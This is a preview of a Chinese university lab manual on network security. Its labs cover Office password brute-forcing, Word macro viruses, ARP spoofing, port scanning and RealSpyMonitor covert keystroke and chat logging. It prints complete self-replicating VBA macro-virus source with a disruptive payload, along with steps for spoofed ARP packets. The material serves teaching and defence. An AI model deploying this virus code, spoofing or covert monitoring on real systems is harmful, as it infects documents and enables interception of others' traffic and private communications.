網(wǎng)絡(luò)與信息安全-實(shí)驗(yàn)指導(dǎo)書(8次)_第1頁(yè)
網(wǎng)絡(luò)與信息安全-實(shí)驗(yàn)指導(dǎo)書(8次)_第2頁(yè)
網(wǎng)絡(luò)與信息安全-實(shí)驗(yàn)指導(dǎo)書(8次)_第3頁(yè)
網(wǎng)絡(luò)與信息安全-實(shí)驗(yàn)指導(dǎo)書(8次)_第4頁(yè)
網(wǎng)絡(luò)與信息安全-實(shí)驗(yàn)指導(dǎo)書(8次)_第5頁(yè)
已閱讀5頁(yè),還剩14頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

網(wǎng)絡(luò)與信息安全實(shí)驗(yàn)指導(dǎo)書

目錄實(shí)驗(yàn)1.office口令破解工具aoxppr的使用實(shí)驗(yàn)2.Word宏病毒實(shí)驗(yàn)實(shí)驗(yàn)3.用C語(yǔ)言編程實(shí)現(xiàn)古典替代密碼(凱撒密碼)實(shí)驗(yàn)4.ARP地址欺騙實(shí)驗(yàn)5.TCP與UDP端口掃描實(shí)驗(yàn)6.RealSpyMonitor監(jiān)控網(wǎng)絡(luò)的使用實(shí)驗(yàn)7.瑞星個(gè)人防火墻安裝使用實(shí)驗(yàn)8.加密軟件pgp的使用實(shí)驗(yàn)一office口令破解工具aoxppr的使用實(shí)驗(yàn)?zāi)康模毫私鈝ord口令破解的方法,掌握暴力破解和字典破解的原理,具體破解某個(gè)word文檔。實(shí)驗(yàn)要求:某個(gè)同學(xué)設(shè)置word口令,長(zhǎng)度分別為4,5,6,采用字母數(shù)字混合。實(shí)驗(yàn)步驟:安裝aoxppr,點(diǎn)setup,一步步安裝完成;運(yùn)行Aoxppr,點(diǎn)擊“幫助”,點(diǎn)擊“輸入注冊(cè)碼”,打開(kāi)key.txt文件,輸入注冊(cè)碼,OK;破解類型選項(xiàng),選暴力破解,字母數(shù)字混合,密碼長(zhǎng)度最大選6;某人制作一個(gè)word文檔,對(duì)其進(jìn)行加密;另一人對(duì)其進(jìn)行解密,在Aoxppr中輸入待解密文件的文件名,點(diǎn)擊開(kāi)始解密。如果該文檔沒(méi)有密碼,軟件馬上就會(huì)報(bào)告此文檔不用解密,4位密碼很快就可破譯,6位的密碼破解時(shí)間要長(zhǎng)一點(diǎn),運(yùn)行過(guò)程中,隨時(shí)可以終止運(yùn)行。系統(tǒng)破解后,會(huì)顯示出Office文檔的密碼。破解過(guò)程中可以使用掩碼,如密碼有8位,以x開(kāi)始,以99結(jié)束,可以設(shè)置掩碼為"x?????99"用該密碼去解密OFFICE文檔。實(shí)驗(yàn)二.Word宏病毒實(shí)驗(yàn)實(shí)驗(yàn)?zāi)康模貉菔竞甑木帉懀?、說(shuō)明宏的原理及其安全漏洞和缺陷;3、理解宏病毒的作用機(jī)制實(shí)驗(yàn)平臺(tái):Windows系列操作系統(tǒng),Word2003應(yīng)用程序?qū)嶒?yàn)步驟:1.軟件設(shè)置:關(guān)閉殺毒軟件;打開(kāi)Word2003,在工具宏安全性中,將安全級(jí)別設(shè)置為低,在可靠發(fā)行商選項(xiàng)卡中,選擇信任任何所有安裝的加載項(xiàng)和模板,選擇信任visualbasic項(xiàng)目的訪問(wèn)。注意:為了保證該實(shí)驗(yàn)不至于造成較大的破壞性,進(jìn)行實(shí)驗(yàn)感染后,被感染終端不要打開(kāi)過(guò)多的word文檔,否則清除比較麻煩(對(duì)每個(gè)打開(kāi)過(guò)的文檔都要清除)。2.自我復(fù)制功能演示。打開(kāi)一個(gè)word文檔,然后按Alt+F11調(diào)用宏編寫窗口(工具宏VisualBasic宏編輯器),在左側(cè)的project—>MicrosoftWord對(duì)象ThisDocument中輸入以上代碼(參見(jiàn)源代碼macro_1.txt),保存,此時(shí)當(dāng)前word文檔就含有宏病毒,只要下次打開(kāi)這個(gè)word文檔,就會(huì)執(zhí)行以上代碼,并將自身復(fù)制到Normal.dot(word文檔的公共模板)和當(dāng)前文檔的ThisDocument中,同時(shí)改變函數(shù)名(模板中為Document_Close,當(dāng)前文檔為Document_Open),此時(shí)所有的word文檔打開(kāi)和關(guān)閉時(shí),都將運(yùn)行以上的病毒代碼,可以加入適當(dāng)?shù)膼阂獯a,影響word的正常使用,本例中只是簡(jiǎn)單的跳出一個(gè)提示框。代碼如下:'Micro-VirusSubDocument_Open()OnErrorResumeNextApplication.DisplayStatusBar=FalseOptions.SaveNormalPrompt=FalseSetourcodemodule=ThisDocument.VBProject.VBComponents(1).CodeModuleSethost=NormalTemplate.VBProject.VBComponents(1).CodeModuleIfThisDocument=NormalTemplateThenSethost=ActiveDocument.VBProject.VBComponents(1).CodeModuleEndIfWithhostIf.Lines(1,1)<>"'Micro-Virus"Then.DeleteLines1,.CountOfLines.InsertLines1,ourcodemodule.Lines(1,100).ReplaceLine2,"SubDocument_Close()"IfThisDocument=NormalTemplateThen.ReplaceLine2,"SubDocument_Open()"ActiveDocument.SaveAsActiveDocument.FullNameEndIfEndIfEndWithMsgBox"MicroVirusbyContentSecurityLab"EndSub代碼解釋以上代碼的基本執(zhí)行流程如下:進(jìn)行必要的自我保護(hù)Application.DisplayStatusBar=FalseOptions.SaveNormalPrompt=False高明的病毒編寫者其自我保護(hù)將做得非常好,可以使word的一些工具欄失效,例如將工具菜單中的宏選項(xiàng)屏蔽,也可以修改注冊(cè)表達(dá)到很好的隱藏效果。本例中只是屏蔽狀態(tài)欄,以免顯示宏的運(yùn)行狀態(tài),并且修改公用模板時(shí)自動(dòng)保存,不給用戶提示。得到當(dāng)前文檔的代碼對(duì)象和公用模板的代碼對(duì)象Setourcodemodule=ThisDocument.VBProject.VBComponents(1).CodeModuleSethost=NormalTemplate.VBProject.VBComponents(1).CodeModuleIfThisDocument=NormalTemplateThenSethost=ActiveDocument.VBProject.VBComponents(1).CodeModuleEndIf檢查模板是否已經(jīng)感染病毒,如果沒(méi)有,則復(fù)制宏病毒代碼到模板,并且修改函數(shù)名。WithHostIf.Lines(1.1)<>"'Micro-Virus"Then.DeleteLines1,.CountOfLines.InsertLines1,Ourcode .ReplaceLine2,"SubDocument_Close()"IfThisDocument=nomaltemplateThen .ReplaceLine2,"SubDocument_Open()"ActiveDocument.SaveAsActiveDocument.FullNameEndIfEndIfEndWith執(zhí)行惡意代碼MsgBox"MicroVirusbyContentSecurityLab"3.具有一定破壞性的宏我們可以對(duì)上例中的惡意代碼稍加修改,使其具有一定的破壞性(這里以著名宏病毒“臺(tái)灣一號(hào)”的惡意代碼部分為基礎(chǔ),為使其在word2003版本中運(yùn)行,且降低破壞性,對(duì)源代碼作適當(dāng)修改,參見(jiàn)源代碼macro_2.txt)。完整代碼如下:'moonlightDimnm(4)SubDocument_Open()'DisableInput1Setourcodemodule=ThisDocument.VBProject.VBComponents(1).CodeModuleSethost=NormalTemplate.VBProject.VBComponents(1).CodeModuleIfThisDocument=NormalTemplateThenSethost=ActiveDocument.VBProject.VBComponents(1).CodeModuleEndIfWithhostIf.Lines(1,1)<>"'moonlight"Then.DeleteLines1,.CountOfLines.InsertLines1,ourcodemodule.Lines(1,100).ReplaceLine3,"SubDocument_Close()"IfThisDocument=NormalTemplateThen.ReplaceLine3,"SubDocument_Open()"ActiveDocument.SaveAsActiveDocument.FullNameEndIfEndIfEndWithCount=0IfDay(Now())=1Thentry:OnErrorGoTotrytest=-1con=1tog$=""i=0Whiletest=-1Fori=0To4nm(i)=Int(Rnd()*10)con=con*nm(i)Ifi=4Thentog$=tog$+Str$(nm(4))+"=?"GoTobegEndIftog$=tog$+Str$(nm(i))+"*"Nextibeg:Beepans$=InputBox$("今天是"+Date$+",跟你玩一個(gè)心算游戲"+Chr$(13)+"若你答錯(cuò),只好接受震撼教育......"+Chr$(13)+tog$,"臺(tái)灣NO.1MacroVirus")IfRTrim$(LTrim$(ans$))=LTrim$(Str$(con))ThenDocuments.AddSelection.Paragraphs.Alignment=wdAlignParagraphCenterBeepWithSelection.Font.Name="細(xì)明體".Size=16.Bold=1.Underline=1EndWithSelection.InsertAfterText:="何謂宏病毒"Selection.InsertParagraphAfterBeepSelection.InsertAfterText:="答案:"Selection.Font.Italic=1Selection.InsertAfterText:="我就是......"Selection.InsertParagraphAfterSelection.InsertParagraphAfterSelection.Font.Italic=0BeepSelection.InsertAfterText:="如何預(yù)防宏病毒"Selection.InsertParagraphAfterBeepSelection.InsertAfterText:="答案:"Selection.Font.Italic=1Selection.InsertAfterText:="不要看我......"GoTooutElseCount=Count+1Forj=1To20BeepDocuments.AddNextjSelection.Paragraphs.Alignment=wdAlignParagraphCenterSelection.InsertAfterText:="宏病毒"IfCount=2ThenGoTooutGoTotryEndIfWendEndIfout:EndSub 該病毒的效果如下:當(dāng)打開(kāi)被感染的word文檔時(shí),首先進(jìn)行自我復(fù)制,感染word模板,然后檢查日期,看是否是1日(即在每月的1日會(huì)發(fā)作),然后跳出一個(gè)對(duì)話框,要求用戶進(jìn)行一次心算游戲,這里只用四個(gè)小于10的數(shù)相乘,如果作者的計(jì)算正確,那么就會(huì)新建一個(gè)文檔,跳出如下字幕:何謂宏病毒答案:我就是......如何預(yù)防宏病毒答案:不要看我......如果計(jì)算錯(cuò)誤,新建20個(gè)寫有“宏病毒”字樣的word文檔,然后再一次進(jìn)行心算游戲,總共進(jìn)行3次,然后跳出程序。關(guān)閉文檔的時(shí)候也會(huì)執(zhí)行同樣的詢問(wèn)。4.清除宏病毒對(duì)每一個(gè)受感染的word文檔進(jìn)行如下操作: 打開(kāi)受感染的word文檔,進(jìn)入宏編輯環(huán)境(Alt+F11),打開(kāi)NormalMicrosoftWord對(duì)象ThisDocument,清除其中的病毒代碼(只要?jiǎng)h除所有內(nèi)容即可)。 然后打開(kāi)ProjectMicrosoftWordThisDocument,清除其中的病毒代碼。 實(shí)際上,模板的病毒代碼只要在處理最后一個(gè)受感染文件時(shí)清除即可,然而清除模板病毒后,如果重新打開(kāi)其他已感染文件,模板將再次被感染,因此為了保證病毒被清除,可以查看每一個(gè)受感染文檔的模板,如果存在病毒代碼,都進(jìn)行一次清除。實(shí)驗(yàn)三.用C語(yǔ)言編程實(shí)現(xiàn)古典替代密碼(凱撒密碼)一、實(shí)驗(yàn)?zāi)康模和ㄟ^(guò)編程實(shí)現(xiàn)替代密碼算法和置換密碼算法,加深對(duì)古典密碼體制的了解,為深入學(xué)習(xí)密碼學(xué)奠定基礎(chǔ)。二、實(shí)驗(yàn)內(nèi)容:實(shí)驗(yàn)附帶的光盤里面有myCrySubstitude.cpp和myCrySubstitude.h文件,提供替代算法加解密數(shù)據(jù)串的接口。實(shí)驗(yàn)附帶的光盤里面統(tǒng)一文件夾下面還有test.cpp文件,試在VC下編譯運(yùn)行test.cpp文件,可以看到命令行界面的替代算法的測(cè)試程序。輸入數(shù)據(jù)串和密鑰,加密,然后解密。記錄下明文和密文。實(shí)驗(yàn)四.ARP地址欺騙實(shí)驗(yàn)?zāi)康模?.加深對(duì)ARP高速緩存的理解2.了解ARP協(xié)議的缺陷實(shí)驗(yàn)環(huán)境:網(wǎng)絡(luò)協(xié)議仿真系統(tǒng)背景描述:流經(jīng)主機(jī)A和主機(jī)C的數(shù)據(jù)包被主機(jī)D使用ARP欺騙進(jìn)行截獲和轉(zhuǎn)發(fā)。流經(jīng)主機(jī)E(接口)和主機(jī)F的數(shù)據(jù)包被主機(jī)B(接口)使用ARP欺騙進(jìn)行截獲和轉(zhuǎn)發(fā)。實(shí)驗(yàn)環(huán)境配置:本實(shí)驗(yàn)采用網(wǎng)絡(luò)結(jié)構(gòu)二。實(shí)驗(yàn)原理:ARP表是IP地址和MAC地址的映射關(guān)系表,任何實(shí)現(xiàn)了IP協(xié)議棧的設(shè)備,一般情況下都通過(guò)該表維護(hù)IP地址和MAC地址的對(duì)應(yīng)關(guān)系,這是為了避免ARP解析而造成的廣播數(shù)據(jù)報(bào)文對(duì)網(wǎng)絡(luò)造成沖擊。ARP表的建立一般情況下是通過(guò)二個(gè)途徑:

1、主動(dòng)解析,如果一臺(tái)計(jì)算機(jī)想與另外一臺(tái)不知道MAC地址的計(jì)算機(jī)通信,則該計(jì)算機(jī)主動(dòng)發(fā)ARP請(qǐng)求,通過(guò)ARP協(xié)議建立(前提是這兩臺(tái)計(jì)算機(jī)位于同一個(gè)IP子網(wǎng)上);

2、被動(dòng)請(qǐng)求,如果一臺(tái)計(jì)算機(jī)接收到了一臺(tái)計(jì)算機(jī)的ARP請(qǐng)求,則首先在本地建立請(qǐng)求計(jì)算機(jī)的IP地址和MAC地址的對(duì)應(yīng)表。因此,針對(duì)ARP表項(xiàng),一個(gè)可能的攻擊就是誤導(dǎo)計(jì)算機(jī)建立正確的ARP表。根據(jù)ARP協(xié)議,如果一臺(tái)計(jì)算機(jī)接收到了一個(gè)ARP請(qǐng)求報(bào)文,在滿足下列兩個(gè)條件的情況下,該計(jì)算機(jī)會(huì)用ARP請(qǐng)求報(bào)文中的源IP地址和源MAC地址更新自己的ARP緩存:1、如果發(fā)起該ARP請(qǐng)求的IP地址在自己本地的ARP緩存中;2、請(qǐng)求的目標(biāo)IP地址不是自己的。舉例說(shuō)明過(guò)程:假設(shè)有三臺(tái)計(jì)算機(jī)A,B,C,其中B已經(jīng)正確建立了A和C計(jì)算機(jī)的ARP表項(xiàng)。假設(shè)A是攻擊者,此時(shí),A發(fā)出一個(gè)ARP請(qǐng)求報(bào)文,該ARP請(qǐng)求報(bào)文這樣構(gòu)造:1、源IP地址是C的IP地址,源MAC地址是A的MAC地址;2、請(qǐng)求的目標(biāo)IP地址是B的IP地址。這樣計(jì)算機(jī)B在收到這個(gè)ARP請(qǐng)求報(bào)文后(ARP請(qǐng)求是廣播報(bào)文,網(wǎng)絡(luò)上所有設(shè)備都能收到),發(fā)現(xiàn)C的ARP表項(xiàng)已經(jīng)在自己的緩存中,但MAC地址與收到的請(qǐng)求的源MAC地址不符,于是根據(jù)ARP協(xié)議,使用ARP請(qǐng)求的源MAC地址(即A的MAC地址)更新自己的ARP表。這樣B的ARP緩存中就存在這樣的錯(cuò)誤ARP表項(xiàng):C的IP地址跟A的MAC地址對(duì)應(yīng)。這樣的結(jié)果是,B發(fā)給C的數(shù)據(jù)都被計(jì)算機(jī)A接收到。實(shí)驗(yàn)步驟:按照拓?fù)浣Y(jié)構(gòu)圖連接網(wǎng)絡(luò),使用拓?fù)潋?yàn)證檢查連接的正確性。

本練習(xí)將主機(jī)A、C和D作為一組,主機(jī)B、E、F作為一組?,F(xiàn)僅以主機(jī)A、C和D為例說(shuō)明試驗(yàn)步驟。(由于兩組使用的設(shè)備不同,采集到的數(shù)據(jù)包不完全相同)主機(jī)A和主機(jī)C使用“arp-a”命令察看并記錄ARP高速緩存。主機(jī)A、C啟動(dòng)協(xié)議分析器開(kāi)始捕獲數(shù)據(jù)并設(shè)置過(guò)濾條件(提取ARP協(xié)議和ICMP協(xié)議)。主機(jī)Aping主機(jī)C。觀察主機(jī)A、C上是捕獲到的ICMP報(bào)文,記錄MAC地址。主機(jī)D啟動(dòng)仿真編輯器向主機(jī)A編輯ARP請(qǐng)求報(bào)文(暫時(shí)不發(fā)送)。其中:

MAC層:“源MAC地址”設(shè)置為主機(jī)D的MAC地址

“目的MAC地址”設(shè)置為主機(jī)A的MAC地址

ARP層:“源MAC地址”設(shè)置為主機(jī)D的MAC地址

“源IP地址”設(shè)置為主機(jī)C的IP地址

“目的MAC地址”設(shè)置為000000-000000。

“目的IP地址”設(shè)置為主機(jī)A的IP地址主機(jī)D向主機(jī)C編輯ARP請(qǐng)求報(bào)文(暫時(shí)不發(fā)送)。其中:

MAC層:“源MAC地址”設(shè)置為主機(jī)D的MAC地址

“目的MAC地址”設(shè)置為主機(jī)C的MAC地址

ARP層:“源MAC地址”設(shè)置為主機(jī)D的MAC地址

“源IP地址”設(shè)置為主機(jī)A的IP地址

“目的MAC地址”設(shè)置為000000-000000。

“目的IP地址”設(shè)置為主機(jī)C的IP地址同時(shí)發(fā)送第4步和第5步所編輯的數(shù)據(jù)包。

注意:為防止主機(jī)A和主機(jī)C的ARP高速緩存表被其它未知報(bào)文更新,可以定時(shí)發(fā)送數(shù)據(jù)包(例如:每隔500ms發(fā)送一次)。觀察并記錄主機(jī)A和主機(jī)C的ARP高速緩存表。在主機(jī)D上啟動(dòng)靜態(tài)路由服務(wù)(方法:在命令行方式下,輸入“staticroute_config”),目的是實(shí)現(xiàn)數(shù)據(jù)轉(zhuǎn)發(fā)。主機(jī)D禁用ICMP協(xié)議。在命令行下輸入“mmc”,啟動(dòng)微軟管理控制臺(tái)。導(dǎo)入控制臺(tái)文件。單擊“文件(F)\打開(kāi)(O)...”菜單項(xiàng)來(lái)打開(kāi)“c:\WINNT\system32\IPSecPolicy\stopicmp.msc”。導(dǎo)入策略文件。單擊“操作(A)\所有任務(wù)(K)\導(dǎo)入策略(I)...”菜單項(xiàng)來(lái)打開(kāi)“c:\WINNT\system32\IPSecPolicy\stopicmp.ipsec”。此命令執(zhí)行成功后,在策略名稱列表中會(huì)出現(xiàn)“禁用ICMP”項(xiàng)。啟動(dòng)策略。用鼠標(biāo)選中“禁用ICMP”項(xiàng),單擊右鍵,選擇“指派(A)”菜單項(xiàng)。主機(jī)A上ping主機(jī)C(“ping主機(jī)C的IP地址–n1”)。-n:發(fā)送count指定的ECHO數(shù)據(jù)包數(shù)。通過(guò)這個(gè)命令可以自己定義發(fā)送的個(gè)數(shù),對(duì)衡量網(wǎng)絡(luò)速度很有幫助。能夠測(cè)試發(fā)送數(shù)據(jù)包的返回平均時(shí)間及時(shí)間的快慢程度。默認(rèn)值為4。主機(jī)A、C停止捕獲數(shù)據(jù),分析捕獲到的數(shù)據(jù),并回答以下問(wèn)題:主機(jī)A、C捕獲到的ICMP數(shù)據(jù)包的源MAC地址和目的MAC地址是什么?結(jié)合主機(jī)A和主機(jī)C捕獲到的數(shù)據(jù)包,繪制出第6步發(fā)送的ICMP數(shù)據(jù)包在網(wǎng)絡(luò)中的傳輸路徑圖。主機(jī)D取消對(duì)ICMP的禁用。在微軟管理控制臺(tái)(mmc)上,用鼠標(biāo)選中“禁用ICMP”項(xiàng),單擊右鍵,選擇“不指派(U)”菜單項(xiàng)。實(shí)驗(yàn)五.TCP與UDP端口掃描實(shí)驗(yàn)?zāi)康牧私獬S玫腡CP、UDP端口掃描的原理及其各種手段

實(shí)驗(yàn)環(huán)境:網(wǎng)絡(luò)協(xié)議仿真系統(tǒng)實(shí)驗(yàn)原理一、TCP/UDP報(bào)文頭格式

UDP報(bào)文格式見(jiàn)實(shí)驗(yàn)六(用戶數(shù)據(jù)報(bào)協(xié)議UDP);TCP報(bào)文格式見(jiàn)實(shí)驗(yàn)七(傳輸控制協(xié)議TCP)實(shí)驗(yàn)原理。在TCP首部中6個(gè)標(biāo)志位的用法依次為:

URG緊急指針(urgentpointer)有效。

ACK確認(rèn)序號(hào)有效。

PSH接收方應(yīng)該盡快將這個(gè)報(bào)文段交給應(yīng)用層。

RST重建連接。

SYN同步序號(hào)用來(lái)發(fā)起一個(gè)連接。

FIN發(fā)端完成發(fā)送任務(wù)

二、ICMP端口不可達(dá)報(bào)文

ICMP端口不可達(dá)報(bào)文格式見(jiàn)Internet控制報(bào)文協(xié)議ICMP實(shí)驗(yàn)原理。類型域?yàn)?,代碼域?yàn)?表示該ICMP報(bào)文為端口不可達(dá)報(bào)文,它是ICMP目的不可達(dá)報(bào)文的一種。三、TCPconnect()掃描

這種方法最簡(jiǎn)單,直接連到目標(biāo)端口并完成一個(gè)完整的三次握手過(guò)程(SYN,SYN/ACK,和ACK)。操作系統(tǒng)提供的“connect()”函數(shù)完成系統(tǒng)調(diào)用,用來(lái)與每一個(gè)感興趣的目標(biāo)計(jì)算機(jī)的端口進(jìn)行連接。如果端口處于偵聽(tīng)狀態(tài),那么“connect()”函數(shù)就能成功。否則,這個(gè)端口是不能用的,即沒(méi)有提供服務(wù)。這個(gè)技術(shù)的一個(gè)最大的優(yōu)點(diǎn)是不需要任何權(quán)限,系統(tǒng)中的任何用戶都有權(quán)利使用這個(gè)調(diào)用。另一個(gè)好處是速度。如果對(duì)每個(gè)目標(biāo)端口以線性的方式,使用單獨(dú)的“connect()”函數(shù)調(diào)用,那么將會(huì)花費(fèi)相當(dāng)長(zhǎng)的時(shí)間,你可以通過(guò)同時(shí)打開(kāi)多個(gè)套接字,從而加速掃描。使用非阻塞I/O允許你設(shè)置一個(gè)低的時(shí)間用盡周期,同時(shí)觀察多個(gè)套接字。但這種方法的缺點(diǎn)是很容易被發(fā)覺(jué),并且很容易被過(guò)濾掉。目標(biāo)計(jì)算機(jī)的日志文件會(huì)顯示一連串的連接和連接出錯(cuò)的服務(wù)消息,目標(biāo)計(jì)算機(jī)用戶發(fā)現(xiàn)后就能很快使它關(guān)閉。

四、TCPSYN掃描

這種技術(shù)也叫“半開(kāi)放式掃描”(half-openscanning),因?yàn)樗鼪](méi)有完成一個(gè)完整的TCP協(xié)議連接。這種方法向目標(biāo)端口發(fā)送一個(gè)SYN分組(packet),如果目標(biāo)端口返回SYN/ACK標(biāo)志,那么可以肯定該端口處于檢聽(tīng)狀態(tài);否則,返回的是RST/ACK標(biāo)志。這種方法比第一種更具隱蔽性,可能不會(huì)在目標(biāo)系統(tǒng)中留下掃描痕跡。但這種方法的一個(gè)缺點(diǎn)是,必須要有root權(quán)限才能建立自己的SYN數(shù)據(jù)包。

五、TCPFIN掃描

這種方法向目標(biāo)端口發(fā)送一個(gè)FIN分組。按RFC793的規(guī)定,對(duì)于所有關(guān)閉的端口,目標(biāo)系統(tǒng)應(yīng)該返回一個(gè)RST(復(fù)位)標(biāo)志。這種方法通常用在基于UNIX的TCP/IP協(xié)議堆棧,有的時(shí)候有可能SYN掃描都不夠秘密。一些防火墻和包過(guò)濾器會(huì)對(duì)一些指定的端口進(jìn)行監(jiān)視,有的程序能檢測(cè)到這些掃描。相反,F(xiàn)IN數(shù)據(jù)包可能會(huì)沒(méi)有任何麻煩的通過(guò)。這種掃描方法的思想是關(guān)閉的端口會(huì)用適當(dāng)?shù)腞ST來(lái)回復(fù)FIN數(shù)據(jù)包。另一方面,打開(kāi)的端口會(huì)忽略對(duì)FIN數(shù)據(jù)包的回復(fù)。這種方法和系統(tǒng)的實(shí)現(xiàn)有一定的關(guān)系,有的系統(tǒng)不管端口是否打開(kāi),都回復(fù)RST,這樣,這種掃描方法就不適用了。并且這種方法在區(qū)分Unix和NT時(shí),是十分有用的。

六、UDP端口掃描

這種方法向目標(biāo)端口發(fā)送一個(gè)UDP協(xié)議分組。如果目標(biāo)端口以“ICMPportunreachable”消息響應(yīng),那么說(shuō)明該端口是關(guān)閉的;反之,如果沒(méi)有收到“ICMPportunreachable”響應(yīng)消息,則可以肯定該端口是打開(kāi)的。由于UDP協(xié)議是面向無(wú)連接的協(xié)議,這種掃描技術(shù)的精確性高度依賴于網(wǎng)絡(luò)性能和系統(tǒng)資源。另外,如果目標(biāo)系統(tǒng)采用了大量分組過(guò)濾技術(shù),那么UDP協(xié)議掃描過(guò)程會(huì)變得非常慢。如果你想對(duì)Internet進(jìn)行UDP協(xié)議掃描,那么你不能指望得到可靠的結(jié)果。實(shí)驗(yàn)環(huán)境配置該實(shí)驗(yàn)采用網(wǎng)絡(luò)結(jié)構(gòu)一。實(shí)驗(yàn)步驟:按照拓?fù)浣Y(jié)構(gòu)圖連接網(wǎng)絡(luò),使用拓?fù)潋?yàn)證檢查連接的正確性。本練習(xí)將主機(jī)A和B作為一組,主機(jī)C和D作為一組,主機(jī)E和F作為一組?,F(xiàn)僅以主機(jī)A和B為例,說(shuō)明實(shí)驗(yàn)步驟。一:TCPConnect掃描1.在主機(jī)B上啟動(dòng)協(xié)議分析器進(jìn)行數(shù)據(jù)捕獲,并設(shè)置過(guò)濾條件(提取TCP協(xié)議)。

2.在主機(jī)A上使用TCP連接工具,掃描主機(jī)B的某一端口:

a.主機(jī)A上填入主機(jī)B的IP、主機(jī)B的某一開(kāi)放端口號(hào),點(diǎn)擊“連接”按鈕進(jìn)行連接。

b.觀察提示信息,是否連接上。

c.主機(jī)A點(diǎn)擊“斷開(kāi)”按鈕斷開(kāi)連接。

d.主機(jī)A使用主機(jī)B的某一未開(kāi)放的端口重復(fù)以上試驗(yàn)步驟。

3.察看主機(jī)B捕獲的數(shù)據(jù),分析連接成功與失敗的數(shù)據(jù)包差別。

結(jié)合捕獲數(shù)據(jù)的差別,說(shuō)明TCPConnet掃描的實(shí)現(xiàn)原理。二:TCPSYN掃描1.在主機(jī)A上使用端口掃描來(lái)獲取主機(jī)B的TCP活動(dòng)端口列表(掃描端口范圍設(shè)置為0~65535)。

2.在主機(jī)B上啟動(dòng)協(xié)議分析器進(jìn)行數(shù)據(jù)捕獲,并設(shè)置過(guò)濾條件(提取TCP協(xié)議)。

3.主機(jī)A編輯TCP數(shù)據(jù)包:

MAC層:

目的MAC地址:B的MAC地址。

源MAC地址:A的MAC地址。

IP層:

源IP地址:A的IP地址。

目的IP地址:B的IP地址。

TCP層:

源端口:A的未用端口(大于1024)。

目的端口:B的開(kāi)放的端口(建議不要選擇常用端口)。

標(biāo)志SYN置為1,其他標(biāo)志置為0。

4.發(fā)送主機(jī)A編輯好的數(shù)據(jù)包。

5.修改主機(jī)A編輯的數(shù)據(jù)包(將目的端口置為主機(jī)B上未開(kāi)放的TCP端口),將其發(fā)送。

6.察看主機(jī)B捕獲的數(shù)據(jù),找到主機(jī)A發(fā)送的兩個(gè)數(shù)據(jù)包對(duì)應(yīng)的應(yīng)答包。

分析兩個(gè)應(yīng)答包的不同之處,說(shuō)明TCPSYN掃描的實(shí)現(xiàn)原理。三:UDP端口掃描1.在主機(jī)B上使用命令“netstat-a”,顯示本機(jī)可用的TCP、UDP端口。注意:通過(guò)此命令,會(huì)得到一個(gè)UDP開(kāi)放端口列表,同學(xué)可以在UDP開(kāi)放端口列表中任選一個(gè)來(lái)完成此練習(xí)。下面以microsoft-ds(445)端口為例,說(shuō)明練習(xí)步驟。

2.在主機(jī)B上啟動(dòng)協(xié)議分析器進(jìn)行數(shù)據(jù)捕獲并設(shè)置過(guò)濾條件(提取主機(jī)A的IP和主機(jī)B的IP)。

3.主機(jī)A編輯UDP數(shù)據(jù)包:

MAC層:

目的MAC地址:B的MAC地址。

源MAC地址:A的MAC地址。

IP層:

源IP地址:A的IP地址。

目的IP地址:B的IP地址。

UDP層:

源端口:A的可用端口。

目的端口:B開(kāi)放的UDP端口445。

4.發(fā)送主機(jī)A編輯好的數(shù)據(jù)包。

5.修改主機(jī)A編輯的數(shù)據(jù)包(將目的端口置為主機(jī)B上未開(kāi)放的UDP端口),將其發(fā)送。

6.察看主機(jī)B捕獲的數(shù)據(jù)。

主機(jī)A發(fā)送的數(shù)據(jù)包,哪個(gè)收到目的端口不可達(dá)的ICMP數(shù)據(jù)報(bào)。

說(shuō)明這種端口掃描的原理。

使用這種端口掃描得到的結(jié)果準(zhǔn)確嗎?說(shuō)明理由。實(shí)驗(yàn)六.RealSpyMonitor監(jiān)控網(wǎng)絡(luò)的使用實(shí)驗(yàn)?zāi)康模?。利用RealSpyMonitor記錄電腦上所有的操作;2。利用RealSpyMonitor查看所作的紀(jì)錄。實(shí)驗(yàn)要求:1人1組,獨(dú)立完成實(shí)驗(yàn)步驟:首先進(jìn)行安裝,按步驟一步步進(jìn)行;第一次運(yùn)行設(shè)置密碼;RealSpyMonitor主界面共分為四列,分別是“Option”,“PCActivity”,“Internet”以及“Buttons”。RealSpyMonitor的Configuration界面有七個(gè)頁(yè)面,我們先來(lái)看看“GeneralSetting”頁(yè)面。在該頁(yè)面中,我們可以設(shè)定RealSpyMonitor是否在開(kāi)機(jī)的時(shí)候自動(dòng)啟動(dòng),自動(dòng)啟動(dòng)是否僅僅在當(dāng)前用戶生效,以及啟動(dòng)的時(shí)候是否隱藏界面,是否在桌面設(shè)置RealSpyMonitor的快捷方式,是否在啟動(dòng)的時(shí)候彈出警告等。一般來(lái)說(shuō),如果我們希望更有效地發(fā)揮RealSpyMonitor的監(jiān)控功能,我們只需要勾上“LoadmeonWindowsStartupforallUsers”選項(xiàng),其它則保留默認(rèn)設(shè)置就可以了。下面我們進(jìn)入“LoggingRecord”頁(yè)面,在這個(gè)頁(yè)面中,我們可以選擇在RealSpyMonitor啟動(dòng)后所需要記錄的事件:鍵盤的敲擊;窗口的標(biāo)題;瀏覽的Web頁(yè)面;執(zhí)行的程序;訪問(wèn)的文件;MSN,ICQ,AIM,YahooMessenger等聊天工具的聊天記錄;MSN/Hotmail和Yahoo郵箱的信件內(nèi)容。我們還可以選擇記錄文件的路徑以及

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
